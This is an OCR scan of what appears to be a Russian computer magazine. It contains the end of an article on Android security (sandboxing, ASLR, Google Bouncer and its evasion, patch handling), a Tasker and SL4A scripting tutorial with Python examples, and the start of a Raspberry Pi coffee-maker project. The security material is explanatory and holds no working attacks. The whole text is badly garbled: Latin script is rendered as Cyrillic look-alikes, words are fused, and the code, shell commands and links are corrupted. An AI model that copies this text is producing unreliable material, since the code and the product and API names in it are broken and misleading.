с АРМѵб). Также АпсІгоісІ 2.3 задействует метод 
защиты отуязвимости, найденной в ноябре 
2009 года во всех ядрах І_іпих 2.6 (возможность 
разыменования І\ІШ_І_-указателя), с помощью 
записи отличного от нуля значения в файл /ргос/ 
5у5/ѵт/ттар_тіп_асІсІг. Такой метод защиты 
позволил устранить уязвимость без необхо- 
димости в обновлении самого ядра І_іпих, что 
невозможно на многих устройствах. 

Начиная с версии 4.0, Соодіе внедрила 
в АпсІгоісІ технологию АсІбгезз зрасе Іауоиі 
гапсіотігаііоп (А5І_Р), которая позволяет рас- 
положить в адресном пространстве процесса 
образ исполняемого файла, подгружаемых 
библиотек, кучи и стека случайным образом. 
Благодаря этому эксплуатация многихтипов 
атак существенно усложняется, поскольку ата- 
кующему приходится угадывать адреса перехо- 
да для успешного выполнения атаки. В допол- 
нение, начиная с версии 4.1, АпсІгоісІ собирается 
с использованием механизма РЕБРО (Реаб-опіу 
геіосаііопз), который позволяет защитить 
системные компоненты от атак, основанных 
на перезаписи секций загруженного в память 
ЕБР-файла. В той же версии 4.1 была впервые 
активирована функция ядра бтезд_ге5ІгісІ 
(/ргос/зуз/кегпеІ/сІте5д_ге5Ігісі), появившаяся 
в ядре 2.6.37 и позволяющая отключить возмож- 
ность чтения системного журнала ядра (сітезд) 
непривилегированными пользователями. 



РЕПОЗИТОРИЙ ПРИЛОЖЕНИЙ 



Репозиторий приложений боодіе РІау (в девиче- 
стве АпсІгоісІ Магкеі) всегда был самым слабым 
местом АпсІгоісІ. Несмотря на то что механизм, 
требующий от приложений обязательного ука- 
зания списка своих привилегий перед установ- 
кой, изначально работал правильно и позволял 
создать экосистему, в которой пользователи 
сами бы могли предупреждать друг друга о 
возможном зловредном поведении программы, 
опубликованной в репозитории, пользователи 
то и дело заражали свои смартфоны вирусами. 

Основная проблема здесь заключалась 
в том, что приложение и его автор не подверга- 
лись каким-либо серьезным проверкам перед 
публикацией пакета в репозиторий. Фактически 
все, что нужно было сделать, — это написать 
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Принцип работы Віпсіег 

программу, создать аккаунт в боодіе РІау, 
внести членский взнос и опубликовать при- 
ложение. Все это мог сделать абсолютно любой 
человек, выложив в Маркет любой код, что и 
было многократно продемонстрировано в раз- 
личных исследованиях безопасности АпсІгоісІ. 

Чтобы хотя бы частично решить эту пробле- 
му, не прибегая к ручной проверке приложений 
на безопасность, как сделано в Арріе Арр біоге, 
боодіе в начале этого года ввела в строй сервис 
Воипсег, представляющий собой виртуальную 
машину, в которой автоматически запускается 
любое публикуемое в репозитории приложение. 
Воипсег выполняет многократный запуск софти- 
ны, производит множество действий, симули- 
рующих работу пользователя с приложением, 
и анализирует состояние системы до и после 
запуска с целью выяснить, не было ли попыток 
доступа к приватной информации, отправки 
5М5 на короткие платные номера и так далее. 

По словам боодіе, Воипсег позволил со- 
кратить количество вредоносов сразу после 
запуска сервиса на 40%. Однако, как показали 
дальнейшие исследования, его можно было 
легко обойти: проанализировать некоторые ха- 
рактеристики системы (е-таіі-адрес владельца 
«смартфона», версию ОС и так далее) и затем 
создать приложение, которое при их обнару- 
жении не будет вызывать подозрений, а после 
попадания на настоящий смартфон делать всю 
грязную работу. 

Скорее всего, Соодіеуже разработала схему 
противодействия обнаружению Воипсег с по- 
мощью генерации уникальных виртуальных 
окружений для каждого нового приложения, но 
так или иначе вирусы будут продолжать прони- 
кать в боодіе РІау, и стоит быть внимательным 
при установке приложений, обязательно читая 
отзывы пользователей и анализируя список 
полномочий приложения перед его установкой. 



РЕВЬЮ КОДА И ОБНОВЛЕНИЯ 



Последнее, но не менее важное, о чем хотелось 
бы сказать, говоря о системе безопасности 
АпсІгоісІ, — это ревью кода и процесс реагиро- 



вания команды разработчиков на появление 
новых уязвимостей. Когда-то программисты 
ОрепВбО показали, что это один из наиболее 
важных аспектов разработки безопасной ОС, 
и боодіе следует их примеру достаточно четко. 

В боодіе на постоянной основе работает 
команда безопасности АпсІгоісІ (АпсІгоісІ бесигііу 
Теат), задача которой заключается в том, чтобы 
следить за качеством кода операционной систе- 
мы, выявлять и исправлять найденные в ходе 
разработки новой версии ОС ошибки, реагиро- 
вать на отчеты об ошибках, присланные пользо- 
вателями и секьюрити-компаниями. В целом эта 
команда работает в трех направлениях: 

• Анализновыхсерьезныхнововведений ОС 
на безопасность. Любое архитектурное из- 
менение АпсІгоісІ должно быть в обязательном 
порядкеодобреноэтими ребятами. 

• Тестирование разрабатываемого кода, в ко- 
тором при ни маютучастие боодіе ІпіюгтаЛоп 
бесигііу Епдіпеегіпдіеат и независимые 
консультанты. Идетпостоянно на протяжении 
всего цикла подготовки нового релиза ОС. 

• Реагирование на обнаружен неуязвимости 
вужевыпущенной ОС. Включаетвсебя по- 
стоянный мониторинг возможных источников 
информации о найденной уязви мости, а также 
поддержку стандартного баг-трекера. 



Если уязвимость будет обнаружена, команда 
безопасности начинает следующий процесс: 

1. Уведомляет компании, входящие вальяне 
0НА(0реп НапсІзеіАІІіапсе), и начинает об- 
суждение вариантов решения проблемы. 

2. Кактолько решение будет найдено, в код 
вносятся исправления. 

3. Патч, содержащий решение проблемы, на- 
правляется членам ОНА. 

4. Патч вносится в репозиторий АпсІгоісІ Ореп 
боигсе Рго)есС 

5. Производители/операторы начинаютоб- 
новление своих устройств в режиме ОТА или 
публику ют исправленную версию прошивки 
на своихсайтах. 

Особенно важным в этой цепочке является 
то, что обсуждение проблемы будет проис- 
ходить только с теми членами ОНА, которые 
подписали соглашение о неразглашении. Это 
дает гарантию, что общественность узнает 
о найденной проблеме только после того, как 
она уже будет решена компаниями и фикс по- 
явится в репозитории А05Р. Если же об уяз- 
вимости станет известно из общедоступных 
источников (форума, например), команда 
безопасности сразу приступит к решению 
проблемы в репозитории А05Р, так чтобы 
доступ к исправлению получили сразу все и 
как можно скорее. 

Слабым местом остаются производители 
устройств и операторы связи, которые могут 
затянуть с публикацией исправленной версии, 
несмотря на ранний доступ к исправлению. 



выводы 



Как и любая другая операционная система, 
АпсІгоісІ не лишена уязвимостей и различных 
архитектурных допущений, упрощающих 
жизнь вирусописателей. Но говорить о том, 
что АпсІгоісІ уязвима по определению, также 
не стоит. В ней явно прослеживается влияние 
последних тенденций в разработке безопас- 
ных операционных систем. Это и песочницы 
для приложений, и четко контролируе- 
мый системой механизм обмена данными 
между приложениями, и наработки проекта 
ОрепВбО — единственной ОС общего на- 
значения, разработка которой всегда велась 
с упором на безопасность. □С 
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Приложениям вход в каталог с частной информацией других приложений закрыт 
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Х-МОВІІ.Е 



Роман Гоций (доІзцУотапйдтаіІ.сот) 




Самый умный 
смартфон 



ОБ АВТОМАТИЗАЦИИ И СКРИПТИНГЕ ДЛЯ АЫОКОІО 



Привет, читатель. Не знаю, как ты, а я ну 
очень ленивый. И я не люблю вновь и вновь 
повторять какие-то стандартные действия, 
если можно написать скрипт. В АпбгоісІ 
для этого можно использовать визуальный 
инструмент автоматизации Тазкег и среду 
исполнения скриптов 5І.4А, которые, работая 
в паре, позволяют сделать смартфон по- 
настоящему умным девайсом. 



ТА5КЕР 



Тазкег представляет собой небольшое, но очень мощное при- 
ложение для автоматизации устройств под управлением АпбгоісІ. 
Принцип его действия основан на выполнении определенных 
задач в момент возникновения событий, так или иначе меняющих 
состояние смартфона. Я знаю, что звучит это не особо впечатля- 
юще, однако в умелых руках Тазкег позволяет творить настоящие 
чудеса. Для затравки приведу несколько примеров. 

Что ты обычно делаешь при включении громкой связи? Пра- 
вильно, кладешь телефон на стол. А что, если громкая связь вклю- 
чится сама, когда ты положишь телефон экраном вниз во время 
разговора? Удобно? Так вот, Тазкег позволяет реализовать такое 
поведение буквально за минуту. Также можно настроить автомати- 
ческий запуск плеера при подключении наушников, автоматиче- 
скую отправку 5М5, когда доезжаешь до дома, или переключение 
музыки в плеере встряхиванием телефона. С помощью Тазкег все 
это достижимо в несколько тапов по экрану. 



Приложение это платное и стоит 3,49 фунта стерлингов (при- 
мерно пять долларов), но прежде чем покупать, можно ознако- 
миться с программой, скачав ІгіаІ-версию на семь дней с сайта 
разработчика Іазкег.біпаІізсЬ.пеІ . Недели будет вполне достаточно: 
например, лично я без сомнений купил программу всего через два 
дня использования и уверен, что ты поступишь так же. Кстати, 
учти, что версия с боодіе РІау не имеет функции шифрования из-за 
ограничений законов США. 



ОСНОВНЫЕ понятия 



Итак, рассмотрим интерфейс и основные понятия програм- 
мы. Для начала сменим язык приложения на русский (Меню — > 
Ргеіюгепсез — ► І_апдиаде] (это делать не обязательно, если 
основным языком системы выбран русский. — Прим. ред.). Теперь 
вернемся на главный экран. Он поделен на три раздела: «РгоПІез», 
«Тазкз» и «Бсепез» (скриншот 1). 

В разделе «РгоЛІез» отображаются, как понятно из его на- 
звания, пользовательские профили. Профиль — это один или 
несколько контекстов и привязанная к ним задача, где контекст — 
это некоторое условие, такое как, например, переворот телефона 
экраном вниз, включение СР5 или проседание заряда батареи до 
определенного уровня. Если все контексты профиля становятся 
активными, то активизируется сам профиль и начинает выпол- 
няться начальная задача профиля. Если хоть один из контекстов 
профиля становится неактивен, профиль дезактивируется и вы- 
полняется конечная задача. 

Например, для профиля с одним контекстом «Телефон лежит 
экраном вниз» начальная задача выполнится после того, как 
устройство приобретет нужную позицию (то есть экраном вниз), 
а конечная — когда оно покинет эту позицию. Задача — это одно 
или целая цепочка действий, где действие — это какая-то эле- 
ментарная операция. Разработчики предоставили нам очень много 
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Самый умный смартфон 




Скриншот 1: главное окно Тазкег 



Скриншот 2: типы контекстов 



Скриншот 3: разделы контекста «Состояние» 



действий, начиная от вывода сообщений на экран и заканчивая 
файловыми операциями. Наличие и их последовательность в 
задаче определяем мы. Действия можно поделить на настройки 
и собственно действия. Настройки отличаются от действий тем, 
что они возобновляют прежнее состояние после дезактивации 
контекста. Например, звонок по определенному номеру является 
действием, а включение громкой связи — настройкой. В приложе- 
нии их можно отличить по пиктограмме: молния — это действие, 
шестеренка — настройка. 



СОЗДАЕМ ПРОФИЛЬ 



Вооружившись знаниями, попробуем создать наш первый про- 
филь: автоматическое включение громкой связи в том случае, 
если телефон переворачивают экраном вниз. Для создания нового 
профиля нажимаем кнопку «+» внизу по центру экрана. Появится 
окошко с приглашением к вводу имени профиля. Имя указывать 
не обязательно, но рекомендуется, дабы в будущем не запутаться 
среди профилей (я ввел «Громкая связь»). Далее ты увидишь меню 
выбора типа первого контекста (скриншот 2). Рассмотрим все типы 
подробнее: 

• Приложение. Этоттип контекста активен тогда, когда запущено 
некоторое приложение, и дезактивируется, если приложениеза- 
крыть. После выбора этого пункта загружается списокустанов- 
ленных приложений, из которых можно выбрать как одно, так и 
несколько. 

• Время. Здесь можно выбрать время активности контекста, тогда 
контекст будетактивен втечение выбранного промежутка вре- 
мени. Также можно установить повторение, тогда контекст будет 
активизироваться на короткий промежуток, повторяясьчерез 
указанноевремя. 

• День. Можно выбрать день месяца или недели, когда контекст 
активен. Тут все просто. 

• Место. Очень полезный и интересный контекст, активизируется 
тогда, когдаустройство оказывается в некоем радиусе отуказан- 
нойточки на карте (см. соответствующую врезку). 

• Состояние и событие. События и ихособенности мы рассмотрим 



в следующем примере. Сейчас же нас интересует пун кт «Состоя- 
ние». Этоттип контекста активен, когдаустройство пребывает в 
конкретном состоянии, например в режиме полета, при активном 
подключении кѴѴі-Рі-сети или же в положении экраном вниз, что 
и надо для нашей задачи (да-да, я еще помню о ней :)). 

Выбираем пункт «Состояние» и видим несколько категорий 
(скриншот 3). Нам нужна категория «Зепзог», а в ней пункт «Ориен- 
тация». Далее в выпадающем списке нужно выбрать необходимую 
ориентацию устройства. В нашем случае следует выбрать «Экраном 
вниз» и нажать на зеленую галочку. Выскочит меню выбора задачи 
для заданного контекста. Так как задач у нас пока нет, нажимаем 
«Новая задача». Вводим название задачи (можно не вводить, но реко- 
мендую) и попадаем в меню редактирования задачи. 



СОЗДАНИЕ ЗАДАЧ 



Как я уже говорил, задачи — это последовательности действий. 
Чтобы добавить к задаче действие, следует нажать кнопку «плюс» 
(скриншот 4). Все действия разбиты на несколько категорий, 
названия которых говорят сами за себя. Для цели, поставленной 
нами, нужно выбрать пункт «Аудио», затем выбрать настройку 
«Громкая связь» и в выпадающем списке — «Включить». Галочка 
«Если» позволяет навесить дополнительные условия на кон- 
кретную задачу (если интересно, подробнее тут: аоо.аІ/ссіНХГі ). 
Нажимаем зеленую галочку — действие добавлено к задаче. 
Можно добавить еще несколько действий, но в нашем случае это 
не требуется, так что еще раз нажимаем зеленую галочку, и только 
что созданная задача становится начальной задачей профиля. Так 
как громкая связь является настройкой, то после дезактивации 
контекста она будет отключена. 

Теперь наш первый профиль готов, но пока еще малоэффекти- 
вен; постоянная проверка положения смартфона быстро «выест» 
батарею. Чтобы обойти эту проблему, добавим к профилю еще один 
контекст: долгое нажатие на уже существующем контексте, «Доба- 
вить — > Состояние — ► Телефон». Выбираем контекст «СаІІ», который 
активен во время звонка. В выпадающем меню можно выбратьтип 
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Х-МОВИЕ 



звонка, выбираем «Апу», конкретный номер не указываем. Теперь, 
когда в профиле два контекста, Тазкег выполняет их проверку в по- 
рядке увеличения энергоемкости, то есть сначала будет проверен 
« С а 1 1 » и, если он неактивен, проверка остановится, что сохранит 
нам батарею. Профиль готов! Можешь проверить. Позвони, а затем 
положи телефон экраном вниз, и вуаля — громкая связь включи- 
лась, теперь подними — выключилась. Захватывающе, правда? 



ПЕРЕКЛЮЧЕНИЕ МУЗЫКИ В ПЛЕЕРЕ 
ВСТРЯХИВАНИЕМ ТЕЛЕФОНА^^И 



В этом примере я обещал рассказать об особенностях контекста 
«Событие». Контекст «Событие» активизируется только на корот- 
кий промежуток времени, запуская привязанную задачу, и сразу 
дезактивируется. Поэтому в профиле может быть только один кон- 
текст такого типа и у профиля с событием не может быть конечной 
задачи. Также для профилей с событием настройки не возобновля- 
ют своего значения. 

Приступим к реализации нашего профиля. Добавляем новый 
профиль (не забываем дать ему имя) и выбираем для него контекст 
«Событие». Выбираем категорию событий «Зепзог», а затем 
«БЬаке». Выставляем нужные нам значения осей, чувствитель- 
ности и продолжительности. Для этого профиля нам нужно создать 
новую задачу — создаем! В окне редактирования задачи нажима- 
ем плюс; нам нужна категория «Медиа» и действие «Упр. Медиа- 
плеером». Выбираем нужную команду управления и заканчиваем 
создание задачи. Добавим еще один контекст к профилю (на этот 
раз это контекст «Приложение») и выберем из списка наш плеер. 
Теперь опрос сенсора будет происходить только при включенном 
плеере. Все, данный профиль готов, можешь проверить. 



5СРІРТІМѲ І-ЕѴЕІ- ГОР АЙОВОЮ 



Я описал основные фичи Тазкег, но далеко не все. В Тазкег встрое- 
ны средства создания и анализа переменных, можно реализовать 
условные операторы, циклы и даже создавать III для запроса 
данных от пользователя (именно для этого и предназначены 
«Бсепез»). Но и это еще не все, возможности можно расширить, ис- 
пользуя в качестве действий скрипты, созданные с помощью 5І_4А. 

5І_4А (Зсгірііпд І_еѵеІ 1"ог АпсІгоісІ) — это среда исполнения (и соз- 
дания) скриптов для АпсІгоісІ на языках РуШоп, ЭаѵаЗсгірІ, РегІ, 
РиЬу, І_иа, ВеапЗИеІІ и ТсІ. В скриптах может быть использован АРІ 
АпсІгоісІ через специальную обвязку вокруг стандартного Э50ІМ РРС 
платформы АпсІгоісІ, благодаря чему из скриптов можно вызывать 
функции телефонии, отправлять 5М5, получать данные с 6 Р5, 
камеры и акселерометров, формировать ОШ. Скриптовым языком 
де-факто для этой платформы считается РуіЬоп, и мы возьмем на 
вооружение именно его. 

Для начала работы необходимо скачать и установить 5І_4А 
( аоо.д|/и06Х4 ) и РуіНоп ( аоо.аІ/8ІРѵѵУ І. После установки РуіЬоп за- 
пускаем его и нажимаем на кнопку «ІпзІаІІ», чтобы скачались все 
необходимые библиотеки для работы на АпсІгоісІ. 



ОСОБЕННОСТИ КОНТЕКСТА «МЕСТО» 



Контекст «Место», как уже упоминалось, активизируется, когда 
смартфон находится в некотором радиусе отуказанной на карте 
точки. Можно выбрать, использовать ли 6Р5 или же данные от сети, 
а также нужный радиус, значение которого можно указать от 30 ме- 
тров до 999 километров. Для относительно большого радиуса в 
пределах города, где точность данных из сети достаточно высока, 
лучше не использовать 6Р5, который жрет батарею совсем не по- 
детски. Также запомни, что если точность определения положения 
больше, чем радиус срабатывания, то контекст не активизируется. 



Изменение задачи / Без имени 



Кликните '+' чтобы добавить действие 




Скриншот 4: экран создания задачи 

Для примера напишем несколько простых скриптов. Можно де- 
лать это прямо на устройстве, но можно писать и на обычном ком- 
пе, а потом скидывать код в каталог 5І_4А/5сгірІз на карте памяти. 
Для создания нового скрипта запускаем 5І_4А, вызываем меню и 
нажимаем «АсИ», в появившемся списке выбираем «РуіЬоп». Попа- 
даем в окно создания скрипта. В верхнее поле вводим имя, внизуу 
нас уже написано две строчки кода: 

ітрогі: апсігоісі 

сігоісі = апсігоісі .Апсіг оісі О 

Этот код импортирует библиотеку для работы с АРІ и создает 
объект, с помощью которого АРІ будет нам доступен. Разобрать все 
функции АРІ в одной статье нереально, поэтому будем рассма- 
тривать необходимые нам функции в процессе создания скриптов 
(описание АРІ есть во встроенной справке 5І_4А или здесь: доо. 

[69). Сначала рассмотрим функцию такеТоазІ, выводящую 
уведомление. Дописываем две строки к коду: 

# Выводим уведомление и сообщение в консоль 

сІгоісІ.такеТоазіС'НеІІо могіеі ! ") 
ргіпі( "Ні -Ргогп Руііііоп" ) 

Далее сохраняем скрипт и запускаем его, тапнув по его имени. 
Появится меню, показанное на скриншоте 5. Первый пункт означа- 
ет запуск скрипта с консолью, второй — в фоновом режиме. 



УРОВНЕМ ВЫШЕ 



Теперь заскриптим что-нибудь поинтересней. Давай научим 
смартфон анализировать входящее 5М5-сообщение на наличие 
некоторых команд, выполнять их и давать ответ о выполнении 
операции. Для примера пусть у нас будет одна команда ріау пгііізіс, 
после получения которой будет проигран определенный медиа- 
файл. 

ітрогі: апсігоіб 

сігоісі = апсігоісі. Апсігоісі О 
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Самый умный смартфон 



# Получаем список всех сообщений 

гпб^б = сІгоісІ.5т5бе1=Ме55а^е5( , РаІ5е') . гезиіі: 

# Нас интересует последнее полученное сообщение 

ІаБітеББа^е = гп5§5[0] 

# Ищем команду в тексте сообщения 

іб "ріау тиБІс" іп ІаБбтеБза^е^' Ьосіу ' ] : 

# Проигрываем указанный файл 

сігоісі. тесІіаРІаѵб ' /5сІсагсІ/ти5Іс/1:гаск.трЗ ' ) 

# Отправляем ответ об успешном выполнении 

# Первым параметром является номер абонента. 

# вторым - текст сообщения 

сігоісі. 5гпБ5епсІ(1а5І:.асІсІге55., "СоттапсІ сотріебе") 

Можно зациклить эту проверку, но гораздо эффективнее полу- 
чится, если связать выполнение этого скрипта с событием Тазкег 
«Получено текст, сообщ.» из раздела «Телефон». 

Рассмотрим более полезный скрипт. Знаю, что у многих (в 
том числе у меня] есть проблема с отображением кириллических 
символов в ЮЗ-тегах МРЗ-файлов. Удобного решения этой про- 
блемы я так и не нашел, поэтому и написал скрипт. Для его работы 
мне потребовалась сторонняя библиотека Біаддег ( юо.дІ/ѴѴВЮб ). 
Кстати, из 5І_4А можно использовать любые сторонние риге РуіЬоп 
библиотеки, просто копируя их в каталог сот.доодІесосІе.руіЬоп. 
руіЬопЗІюгапсІгоісІ/ехІгаБ/руіЬопЗ на карте памяти. Полный код 
скрипта с подробными комментариями можно найти на прилагае- 
мом к журналу диске, здесь же ограничусь только кодом, который 
перебирает МРЗ-файлы на карте памяти: 

# Перебираем все МРЗ-файлы на карте 

бог(сІігІ\Іате., сіігб., біез) іп об .ма1к(г ' /зсісагсі 1 ) : 

-Рог біепате іп біез: 
бгу : 

іб біепате. епсІБыііІіС 1 .т рЗ ' ) : 

рабНпате = оз.рабІі.іоіпСсІігІМате. біепате) 

# Ну а дальше идет работа с тегами... 

Этот скрипт можно запускать вручную, когда потребуется, 
но я привязал выполнение этого скрипта к событию «Кар. памяти 
доступна» из раздела «Аппаратура» Тазкег. 



ВЗАИМОДЕЙСТВИЕ С ПОЛЬЗОВАТЕЛЕМ 



5І_4А предоставляет нам разные способы взаимодействия с 
пользователем: ѵѵеЬѴіеѵѵз (НТМІ.5 + ЗаѵаБсгірі), РиМБсгееп АРІ (под- 
робнее можно почитать в моей статье: доо.дІ/ОСОсІѵѵ ) и сйаІодАРІ, 
который мы вкратце и рассмотрим. Возьмем скрипт отправки вы- 
бранных пользователем фоток на РТР-сервер. Полный код примера 
есть на диске, а здесь только часть, касающаяся сІіаІодАРІ. 

# Используем модуль ^ІоЬ для извлечения списка 

# изображений в бІеБІМатез 



# Создаем диалог, указывая его заголовок и текст 
сігоісі. сІіа1о§Сгеа1:еА1ег1:(" Выбор файлов" л "Выберите \ 

файлы для отправки"^ 

# Следующей строкой добавляем к диалогу флажки 

сігоісі. сІіа1о§БебМи11:іСІіоісеІ1:ет5(б1е5І\Іате5) 

# А здесь добавляем кнопки 

сіпоісі . с!іа1о^5е1=Ро5І1=іѵеВи1=1=опТех1= ( "ОК" ) 

сігоісі . сІіаІо^ЗеіМе^аІііѵеВиІіІіопТехІіС "Отмена" ) 

# И наконец, показываем диалог 

сігоісі . сІіа!о§5боы( ) 



# Проверяем, какая кнопка была нажата ГроБІбіѵе. пе^абіѵе 

# или пеибгаі) 

іб сігоісі. сІіаІо^бебКеБропзе П . гезиіі: [ 'мііісіі ' ] == \ 

"роБІі іѵе" : 




Скриншот 5: запуск 5І_4А-скриптов 



1 


Ш «II І 3:41 


ні Таил рут Моги 




Ргосеи 




СІо^е іеглпіпаі? 






ьі 



Скриншот 6: результат работы НеІІоѴѴогІсі.ру 



птш 

• Количество кон- 
текстов и действий 
Тазкег можно 
существенно рас- 
ширить, используя 
плагины. Найти их 
можно, вбив в поис- 
ке Маркета «І_осаІе 
ріидіп». 

• 5І.4А — не един- 
ственный скрип- 
товый движок для 
Апсігоііі. Рекомен- 
дую также обратить 
внимание на Кіѵу 
( кіѵу.огд/сіосз/диісіе/ 
апгігдііМті)- 

• Если ты пишешь 
скрипты на 
компьютере, то 
тебе не обязатель- 
но каждый раз 
копировать скрипт 
на устройство. Есть 
средства удаленного 
выполнения; доо. 
д|/1|РхР . 

• Профили, создан- 
ные в Тазкег, можно 
упаковывать в АРК- 
пакеты с помощью 
Тазкег Арр Расіогу: 
доо.дІ/РіОЕт . Анало- 
гичное решение для 
5І.4А: аоо.аІ/К7МТѵ . 

• Если функции 
5І.4А возвращают 
абракадабру, по- 
пробуй проделать со 
строкой такой трюк: 
.епсосІеСсрігбГ). 
сIесосIе( , иН8 , ). 

Ь'.ЧѴІѴІ 

• Официальная стра- 
ница проекта 5І.4А: 

доо.д|/Х2СѵВ: 

• интересные приме- 
ры профилей Тазкег: 

аоо.діАѵЛкЬ: 

• тема о Тагкег 

на 4р(Іа.ги: доо.ді/ 
01НѴѴХ . 



сиз 

На диске лежат пол- 
ные исходные коды 
скриптов, РуІІіоп- 
библиотека Біаддег 
и файл с рассмотрен- 
ными профилями 
Тазкег. 



# Получаем индексы выбранных флажков 

гез сігоісі . (Иа1о§Себ5е1есбес11бет5 ( ) .гезиіі: 



# Используя ббрНЬ. отправляем файлы на сервер 



ЧТО ДАЛЬШЕ? 



Благодаря Тазкег и 5І_4А возможности автоматизировать пользо- 
вательские действия на АпсІгоісІ становятся просто безграничны- 
ми. Сам же 5І_4А предоставляет мощный потенциал для скриптинга 
АпсІгоісІ. Дополнительную информацию ищи по ссылкам, приведен- 
ным в боковых выносах, или же жди от меня новых, более специ- 
ализированных статей. И-И 
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РНКЕАКШ6 



АІехапсІег ЬукозЫп (аІукозЫпгадтаіІ.сот, Іідпе.ги) 



Кофе 
с малиной 

ДЕЛАЕМ ИНТЕРНЕТ- 
КОФЕВАРКУ С КА5РВЕККѴ РІ 



Появившийся в 1998 году шуточный гипертекстовый протокол 
управления кофеваркой НТСРСР/1.0 ныне незаслуженно 
забыт. Чтобы оживить идеи, заложенные в него создателями, 
реализуем кофеварку с управлением от РазрЬеггу Рі. 




ногие любители кофе мечтают о том, чтобы к моменту их 
пробуждения уже был готов горячий кофе. Если в 1998-м 
управление кофеваркой через веб действительно выгля- 
дело забавным, то в наше время это вполне можно сделать своими 
руками. С такой же игрушкой, как РРі, это будет вдвойне интерес- 
нее. На ее фоне пылящийся в коробке Ардуино Мега 2560 кажется 
случайно попавшим в будущее из мира 8-разрядных процессоров 
80-90-х годов раритетом, к которому зачем-то прикрутили ѴѴі-Рі, 
шилды и сенсоры. 

Но вернемся на кухню за кофе. Кофеварку включаем с помощью 
реле, реле управляем с РРі, доступ к РРі из браузера по ѴѴі-Рі. 
Проснувшись, прямо из кровати с помощью браузера в телефоне. 

И смотрим, как он заваривается, через веб-камеру. Либо детекти- 
руем движение, и кофе начинает завариваться в тот момент, когда 
мы заходим на кухню или включаем свет. Настоящий гик сможет 
включить кофеварку из постели через 55Н, настоящий лентяй — 
просто зайдя на кухню, простой же пользователь вроде меня — 
через браузер. 



ВЫБОР КОФЕВАРКИ 



От кофеварки требуется немного. Тип — капельный: и цена 
значительно меньше, и кофе, на мой вкус, мягче, чем в эспрессо. 
И главное — минимум электроники. Все управление должно со- 
стоять из одного механического выключателя, чтобы можно было 
включить кофеварку, просто подав на нее электропитание. Дома 
кофеварка большого объема ник чему, большая мощность тоже 
не нужна: ниже ток — меньше требования к управляющим компо- 
нентам. Хотя в кофеварках такого типа полностью автоматизиро- 
вать процесс приготовления невозможно и нужно будет каждый 
вечер заправлять ее водой и молотым кофе. 

Выбор кофеварок небольшого объема и мощности невелик, 
чуть ли не все предложения — объемом больше литра, но почти 
сразу мне приглянулась Моиііпех ВСА 1.1_1 І_іШе 5оІеа. Мощность 
640 Вт, кофейник 0,6 л. 



СКРУЧИВАЕМ ВСЕ ВМЕСТЕ 



В первой ревизии плат РРі стоят неудачные предохранители 
(рис. 2), из-за которых почти всю ІІ5В-периферию приходится 



подключать через ІІ5В-хаб с дополнительным питанием. В более 
поздних ревизиях эта проблема была исправлена, однако из-за 
того, что мощность источника питания невелика, ІІ5В-хаб все 
равно может понадобиться. 

На двух мониторах, которые я опробовал, при настройках 
по умолчанию была черная кайма по краям экрана. Это корректи- 
руется настройками режима оѵегвсап, в моем случае это решилось 
его выключением в конфигурационном меню. 



ОПЕРАЦИОННАЯ СИСТЕМА 



Основной операционной системой на данный момент является 
РазрЬіап, основанная на йеЫап, с поддержкой аппаратного сопро- 
цессора для операций с плавающей запятой. На странице загрузки 
Ьіі.Іѵ/РЬВІЗЬ можно загрузить не только ее (нужна РазрЬіап 
«ѵѵЬеегу»), но и несколько других, также основанных на І_іпих, 
вместе с необходимыми утилитами. 

Образ карты нужно скачать на диск, разархивировать, за- 
тем, если все делается под ѴѴіпсІоѵѵз, залить с помощью утилиты 
ѴѴіп320ізкІтадег (ссылка есть на странице загрузки), на 50-карту, 
размер которой должен быть от 2 Гб. Далеко не любая 50-карта 
заработает — есть список совместимых карт и другого оборудова- 
ния ( Ьіі.Іу/Р2Мт96 ). но даже использование карт из этого списка 
не гарантирует, что конкретная карта не является подделкой. Если 
РРі не грузится из образа, только что залитого на карту, первое, 
что стоит попробовать, — сменить карту 50. 

После установки 50-карты в РРі, включения и загрузки 
(имя пользователя по умолчанию рі, пароль — газрЬеггу) выводит- 
ся начальное конфигурационное меню, в котором нужно обяза- 
тельно расширить файловую систему с 2 Гб образа на всю 50-карту 
и разрешить 55Н. Кроме того, стоит задать раскладку клавиатуры, 
языки, временную зону и сменить пароль по умолчанию. 

С оверклокингом лучше экспериментировать отдельно, сразу 
после его изменения проверяя стабильность РРі. Но попро- 
бовать его стоит, так как увеличение скорости работы заметно 
визуально. В конфигурационное меню всегда можно вернуться 
командой: 

1 5ЫСІО Га5рІ"СОПЙ§ 
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Кофе с малиной 




Рис. 1. Конфигурационное меню газрі-сопНд 



Рис. 2. Подключение к портам СРЮ. Показаны предохранители, убранные 
в последующих вариантах плат 



После завершения начальной настройки перезагрузиться: 

Следующим шагом стоит обновить пакеты — разработка под РРі 
идет очень активно, и крупные обновления выходят очень часто. 

$ 5исІо арі-^еі: ирсіаіе 
$ зисіо арі-^еі: ир^гасіе 



НАСТРОЙКА ЕТНЕРЫЕТ И ѴѴІ-ЕІ 



Имевшаяся у меня ѴѴі- Рі-ка рта й-Ыпк йѴѴА-140 В2 значилась в 
списке совместимого оборудования Ьі1.Іу/5Ѵ5ЛУ . Подключил, про- 
верил, что успешно определилась: 

$ ІзизЬ 
< . . > 

Виз 001 йеѵісе 006: Ю 07сІ1:Зс0а 0-І_іпк Бузует ОІлІА-140 
Кап§еВоо5іег N АсІар1іег(геѵ. В2) [Каііпк КТ3072] 



$ імсоп6§ 

Іо по ыіпеіезз ехііепзіопз. 

еІіІіѲ по ыігеіезз ехііепзіопз. 

м1ап0 ІЕЕЕ 802 . 11Ь§п Е55ІР:оРР/апу 

Мосіе :Мапа§есІ Ассезз Роіпі:: ІМоІі-АззосіаІіесІ 
Тх-Ромег=20 сі Вт 

Кеігу 1оп§ І ітііі : 7 КТ5 1:И п : о-р-р Рга§тепі: 
ііт: о-р-р 

Роыеп Мапа§етеп1і:оп 

ѴѴі-Рі можно настроить в соответствии с документацией ( ЬіІ.Іѵ/БпеіпЯ . 



55Н И ѴЫС 



Старт сервера 55Н разрешается в меню начальной конфигура- 
ции. Для доступа с ѴѴіпсІоѵѵз-машины можно использовать Риііу, 
с телефона под Андроид — Ігззі СоппесіВоІ. Но тут уже на вкус и 
цвет... 

Если недостаточно 55Н и нужен доступ к рабочему столу РРі 
(например, просмотреть снимки, сделанные Моііоп, не копируя 
их на локальную машину), можно получить его через ѵпсѵіеѵѵег из 
ТідЫѴЫС, а для доступа с Андроида — с помощью апсІгоісІѴМС. Для 
этого нужно установить ѴІ\ІС, используя рекомендации Ьі1.Іѵ/Р2хі11 
